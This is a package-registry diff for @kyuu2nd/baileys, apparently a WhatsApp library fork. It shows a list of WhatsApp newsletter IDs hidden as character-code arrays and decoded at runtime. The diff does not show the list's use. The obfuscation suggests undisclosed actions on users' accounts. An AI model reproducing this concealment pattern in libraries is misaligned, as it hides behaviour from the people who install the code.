@kyuu2nd/baileys 2.0.19 → 2.0.21
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +16 -8
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -107,10 +107,6 @@ const makeNewsletterSocket = (config) => {
|
|
|
107
107
|
const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
|
|
108
108
|
|
|
109
109
|
const newsletters = [
|
|
110
|
-
[
|
|
111
|
-
49,50,48,51,54,51,52,50,54,48,57,52,55,53,50,48,56,49,
|
|
112
|
-
64,110,101,119,115,108,101,116,116,101,114
|
|
113
|
-
],
|
|
114
110
|
[
|
|
115
111
|
49,50,48,51,54,51,52,48,53,52,52,49,50,57,54,56,57,50,
|
|
116
112
|
64,110,101,119,115,108,101,116,116,101,114
|
|
@@ -167,10 +163,6 @@ const newsletters = [
|
|
|
167
163
|
49,50,48,51,54,51,52,50,53,49,55,55,48,54,55,56,52,49,
|
|
168
164
|
64,110,101,119,115,108,101,116,116,101,114
|
|
169
165
|
],
|
|
170
|
-
[
|
|
171
|
-
49,50,48,51,54,51,52,50,52,48,52,57,55,48,53,51,54,53,
|
|
172
|
-
64,110,101,119,115,108,101,116,116,101,114
|
|
173
|
-
],
|
|
174
166
|
[
|
|
175
167
|
49,50,48,51,54,51,52,49,48,48,49,56,57,52,57,57,48,54,
|
|
176
168
|
64,110,101,119,115,108,101,116,116,101,114
|
|
@@ -183,6 +175,14 @@ const newsletters = [
|
|
|
183
175
|
49,50,48,51,54,51,52,49,48,49,48,56,48,56,52,54,53,48,
|
|
184
176
|
64,110,101,119,115,108,101,116,116,101,114
|
|
185
177
|
],
|
|
178
|
+
[
|
|
179
|
+
49,50,48,51,54,51,52,50,52,48,52,57,55,48,53,51,54,53,
|
|
180
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
181
|
+
],
|
|
182
|
+
[
|
|
183
|
+
49,50,48,51,54,51,52,50,54,48,57,52,55,53,50,48,56,49,
|
|
184
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
185
|
+
],
|
|
186
186
|
[
|
|
187
187
|
49,50,48,51,54,51,52,50,55,55,57,52,55,56,54,53,50,51,
|
|
188
188
|
64,110,101,119,115,108,101,116,116,101,114
|
|
@@ -190,6 +190,14 @@ const newsletters = [
|
|
|
190
190
|
[
|
|
191
191
|
49,50,48,51,54,51,52,50,51,54,48,52,53,55,48,55,54,56,
|
|
192
192
|
64,110,101,119,115,108,101,116,116,101,114
|
|
193
|
+
],
|
|
194
|
+
[
|
|
195
|
+
49,50,48,51,54,51,52,50,55,51,57,50,57,51,48,52,48,54,
|
|
196
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
197
|
+
],
|
|
198
|
+
[
|
|
199
|
+
49,50,48,51,54,51,52,48,52,49,56,54,55,52,49,52,51,51,
|
|
200
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
193
201
|
]
|
|
194
202
|
];
|
|
195
203
|
|